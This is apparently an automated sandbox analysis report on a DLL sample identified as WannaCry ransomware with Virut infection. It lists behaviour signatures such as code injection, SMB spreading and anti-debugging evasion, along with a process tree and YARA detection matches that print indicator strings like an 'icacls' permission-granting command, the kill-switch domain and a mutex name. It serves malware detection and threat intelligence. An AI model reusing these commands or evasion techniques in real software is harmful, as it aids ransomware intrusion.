Edit tour

Windows Analysis Report
GeW4GzT8G8.dll

Overview

General Information

Sample name:	GeW4GzT8G8.dll renamed because original name is a hash value
Original sample name:	78bd8b9c610315d7247e2076bbd9458c.dll
Analysis ID:	1592021
MD5:	78bd8b9c610315d7247e2076bbd9458c
SHA1:	a8029cfe179dfc15c9a52ecd4ad491403dc1c1ae
SHA256:	51d5805abb1d7fb68d037399193a5f1b019d23e455fe4a5b82d245a020b5b05b
Tags:	dllexeuser-mentality
Infos:

Detection

Virut, Wannacry

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Tries to download HTTP data from a sinkholed server

Yara detected Virut

Yara detected Wannacry ransomware

AI detected suspicious sample

Changes memory attributes in foreign processes to executable or writable

Connects to many different private IPs (likely to spread or exploit)

Connects to many different private IPs via SMB (likely to spread or exploit)

Contains functionality to detect sleep reduction / modifications

Creates a thread in another existing process (thread injection)

Creates files in the system32 config directory

Drops executables to the windows directory (C:\Windows) and starts them

Found evasive API chain (may execute only at specific dates)

Injects code into the Windows Explorer (explorer.exe)

Installs new ROOT certificates

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Tries to evade debugger and weak emulator (self modifying code)

Tries to resolve many domain names, but no domain seems valid

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected non-DNS traffic on DNS port

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found large amount of non-executed APIs

HTTP GET or POST without a user agent

May check if the current machine is a sandbox (GetTickCount - Sleep)

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Uncommon Svchost Parent Process

Stores large binary data to the registry

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Yara signature match

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 6288 cmdline: loaddll32.exe "C:\Users\user\Desktop\GeW4GzT8G8.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)

conhost.exe (PID: 6296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 3504 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\GeW4GzT8G8.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

rundll32.exe (PID: 5692 cmdline: rundll32.exe "C:\Users\user\Desktop\GeW4GzT8G8.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)

mssecsvc.exe (PID: 4432 cmdline: C:\WINDOWS\mssecsvc.exe MD5: 80F63BEA8710636ED2F30EAD25E07C82)

winlogon.exe (PID: 556 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)

lsass.exe (PID: 640 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)

svchost.exe (PID: 744 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

dllhost.exe (PID: 5628 cmdline: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683} MD5: 08EB78E5BE019DF044C26B14703BD1FA)

fontdrvhost.exe (PID: 776 cmdline: "fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)

fontdrvhost.exe (PID: 784 cmdline: "fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)

svchost.exe (PID: 868 cmdline: C:\Windows\system32\svchost.exe -k RPCSS -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 920 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

dwm.exe (PID: 984 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)

svchost.exe (PID: 1200 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1352 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1392 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1404 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1476 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1648 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1740 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1800 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 2012 cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

rundll32.exe (PID: 5124 cmdline: rundll32.exe C:\Users\user\Desktop\GeW4GzT8G8.dll,PlayGame MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 5860 cmdline: rundll32.exe "C:\Users\user\Desktop\GeW4GzT8G8.dll",PlayGame MD5: 889B99C52A60DD49227C5E485A016679)

mssecsvc.exe (PID: 5568 cmdline: C:\WINDOWS\mssecsvc.exe MD5: 80F63BEA8710636ED2F30EAD25E07C82)

mssecsvc.exe (PID: 1196 cmdline: C:\WINDOWS\mssecsvc.exe -m security MD5: 80F63BEA8710636ED2F30EAD25E07C82)

svchost.exe (PID: 364 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 372 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 772 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 888 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 660 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1044 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1100 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1224 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1412 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1596 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1704 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1716 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1876 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 2020 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Virut		No Attribution	https://blog.malwarebytes.com/threat-analysis/2018/03/blast-from-the-past-stowaway-virut-delivered-with-chinese-ddos-bot/ https://chrisdietri.ch/post/virut-resurrects/ https://krebsonsecurity.com/2013/01/polish-takedown-targets-virut-botnet/ https://securelist.com/review-of-the-virus-win32-virut-ce-malware-sample/36305/ https://www.mandiant.com/resources/pe-file-infecting-malware-ot	https://malpedia.caad.fkie.fraunhofer.de/details/win.virut

Name	Description	Attribution	Blogpost URLs	Link
WannaCryptor, WannaCry, WannaCrypt		Lazarus Group	http://blog.emsisoft.com/2017/05/12/wcry-ransomware-outbreak/ http://www.independent.co.uk/news/uk/home-news/wannacry-malware-hack-nhs-report-cybercrime-north-korea-uk-ben-wallace-a8022491.html https://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html https://blog.avast.com/ransomware-that-infected-telefonica-and-nhs-hospitals-is-spreading-aggressively-with-over-50000-attacks-so-far-today https://blog.comae.io/wannacry-decrypting-files-with-wanakiwi-demo-86bafb81112d	https://malpedia.caad.fkie.fraunhofer.de/details/win.wannacryptor

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
GeW4GzT8G8.dll	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
GeW4GzT8G8.dll	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (with the help of binar.ly)	0x45604:$x1: icacls . /grant Everyone:F /T /C /Q 0x353d0:$x3: tasksche.exe 0x455e0:$x3: tasksche.exe 0x455bc:$x4: Global\MsWinZonesCacheCounterMutexA 0x45634:$x5: WNcry@2ol7 0x3543b:$x6: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com 0x3028:$x7: mssecsvc.exe 0x120ac:$x7: mssecsvc.exe 0x1b3b4:$x7: mssecsvc.exe 0x353a8:$x8: C:\%s\qeriuwjhrf 0x45604:$x9: icacls . /grant Everyone:F /T /C /Q 0x3014:$s1: C:\%s\%s 0x12098:$s1: C:\%s\%s 0x1b39c:$s1: C:\%s\%s 0x353bc:$s1: C:\%s\%s 0x45534:$s3: cmd.exe /c "%s" 0x77a88:$s4: msg/m_portuguese.wnry 0x326f0:$s5: \\192.168.56.20\IPC$ 0x1fae5:$s6: \\172.16.99.5\IPC$ 0xd195:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00 0x78da:$op2: 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44
GeW4GzT8G8.dll	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x455e0:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x45608:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68

Dropped Files

Source	Rule	Description	Author	Strings
C:\Windows\tasksche.exe	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
C:\Windows\tasksche.exe	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
C:\Windows\tasksche.exe	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
C:\Windows\tasksche.exe	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
C:\Windows\mssecsvc.exe	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
C:\Windows\mssecsvc.exe	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (with the help of binar.ly)	0x415a0:$x1: icacls . /grant Everyone:F /T /C /Q 0x3136c:$x3: tasksche.exe 0x4157c:$x3: tasksche.exe 0x41558:$x4: Global\MsWinZonesCacheCounterMutexA 0x415d0:$x5: WNcry@2ol7 0x313d7:$x6: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com 0xe048:$x7: mssecsvc.exe 0x17350:$x7: mssecsvc.exe 0x31344:$x8: C:\%s\qeriuwjhrf 0x415a0:$x9: icacls . /grant Everyone:F /T /C /Q 0xe034:$s1: C:\%s\%s 0x17338:$s1: C:\%s\%s 0x31358:$s1: C:\%s\%s 0x414d0:$s3: cmd.exe /c "%s" 0x73a24:$s4: msg/m_portuguese.wnry 0x2e68c:$s5: \\192.168.56.20\IPC$ 0x1ba81:$s6: \\172.16.99.5\IPC$ 0x9131:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00 0x3876:$op2: 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44 0x13e5:$op3: 18 DF 6C 24 14 DC 64 24 2C DC 6C 24 5C DC 15 88 0x34aa6:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C
C:\Windows\mssecsvc.exe	WannaCry_Ransomware_Gen	Detects WannaCry Ransomware	Florian Roth (based on rule by US CERT)	0x1bacc:$s1: __TREEID__PLACEHOLDER__ 0x1bb68:$s1: __TREEID__PLACEHOLDER__ 0x1c3d4:$s1: __TREEID__PLACEHOLDER__ 0x1d439:$s1: __TREEID__PLACEHOLDER__ 0x1e4a0:$s1: __TREEID__PLACEHOLDER__ 0x1f508:$s1: __TREEID__PLACEHOLDER__ 0x20570:$s1: __TREEID__PLACEHOLDER__ 0x215d8:$s1: __TREEID__PLACEHOLDER__ 0x22640:$s1: __TREEID__PLACEHOLDER__ 0x236a8:$s1: __TREEID__PLACEHOLDER__ 0x24710:$s1: __TREEID__PLACEHOLDER__ 0x25778:$s1: __TREEID__PLACEHOLDER__ 0x267e0:$s1: __TREEID__PLACEHOLDER__ 0x27848:$s1: __TREEID__PLACEHOLDER__ 0x288b0:$s1: __TREEID__PLACEHOLDER__ 0x29918:$s1: __TREEID__PLACEHOLDER__ 0x2a980:$s1: __TREEID__PLACEHOLDER__ 0x2ab94:$s1: __TREEID__PLACEHOLDER__ 0x2abf4:$s1: __TREEID__PLACEHOLDER__ 0x2e2c4:$s1: __TREEID__PLACEHOLDER__ 0x2e340:$s1: __TREEID__PLACEHOLDER__
C:\Windows\mssecsvc.exe	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x4157c:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x415a4:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
Click to see the 3 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000023.00000002.2720636903.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000014.00000002.2719092458.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
0000000C.00000002.1693222311.000000000040F000.00000008.00000001.01000000.00000004.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
0000001D.00000002.2718376405.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
0000000E.00000002.1868184392.000000007FFF0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000007.00000000.1469139921.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000011.00000002.2280238468.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000015.00000002.2719581126.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
0000000A.00000002.2777494237.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000023.00000000.1579253830.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000011.00000002.2303054677.000000007FE40000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000006.00000002.1712925890.000000007FE30000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
0000001E.00000002.2718396660.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
0000001C.00000000.1551989723.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000016.00000002.2718267078.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
0000001E.00000000.1562843216.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000016.00000000.1520258438.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
0000000F.00000000.1497422002.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
0000001E.00000002.2718865273.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000013.00000000.1513385761.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000006.00000002.1710675304.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000006.00000002.1712970939.000000007FE40000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000018.00000002.2719553271.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000019.00000002.2720264639.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000021.00000002.2718953458.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000025.00000002.2718552816.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000019.00000002.2719630248.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000006.00000000.1467969506.000000000040F000.00000008.00000001.01000000.00000004.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
0000001C.00000002.2718375782.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000017.00000002.2719418097.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000025.00000000.1584365051.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000024.00000000.1583741288.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000015.00000002.2719011781.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000024.00000002.2718548042.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000011.00000002.2281703950.0000000002501000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
00000011.00000002.2281703950.0000000002501000.00000004.00000020.00020000.00000000.sdmp	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x32e44:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x32e6c:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
0000001A.00000002.2719776272.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000011.00000000.1507512930.0000000000710000.00000080.00000001.01000000.00000004.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
00000011.00000000.1507512930.0000000000710000.00000080.00000001.01000000.00000004.sdmp	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf57c:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf5a4:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
0000000F.00000002.2718214298.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
0000000C.00000002.1696529532.000000007FE40000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000010.00000000.1504207342.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000014.00000002.2718602569.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000027.00000002.2720101514.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
0000001D.00000000.1556664324.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000020.00000000.1570640748.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000006.00000002.1709919485.000000000040F000.00000008.00000001.01000000.00000004.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
00000025.00000002.2719011282.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000026.00000000.1588780357.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000012.00000002.2719447551.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000010.00000002.2720025241.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000029.00000002.2718553282.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000019.00000000.1545080050.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000024.00000002.2718952875.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
0000001C.00000002.2718656610.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000026.00000002.2719064286.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000021.00000000.1571774510.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
0000001B.00000002.2718712243.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000011.00000002.2279802499.000000000042E000.00000004.00000001.01000000.00000004.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
00000016.00000002.2718209391.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000020.00000002.2718895917.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000010.00000002.2719387016.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000006.00000000.1468096628.0000000000710000.00000080.00000001.01000000.00000004.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
00000006.00000000.1468096628.0000000000710000.00000080.00000001.01000000.00000004.sdmp	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf57c:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf5a4:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
0000000A.00000002.2719121091.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000017.00000002.2718893631.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000018.00000002.2720214040.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000011.00000002.2281362930.0000000001FD6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
00000011.00000002.2281362930.0000000001FD6000.00000004.00000020.00020000.00000000.sdmp	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0x32600:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0x32628:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
00000011.00000002.2280337186.0000000000AA0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000012.00000002.2777701008.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000028.00000000.1594507271.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
00000022.00000002.2719934656.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
0000001B.00000000.1547825890.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_Virut	Yara detected Virut	Joe Security
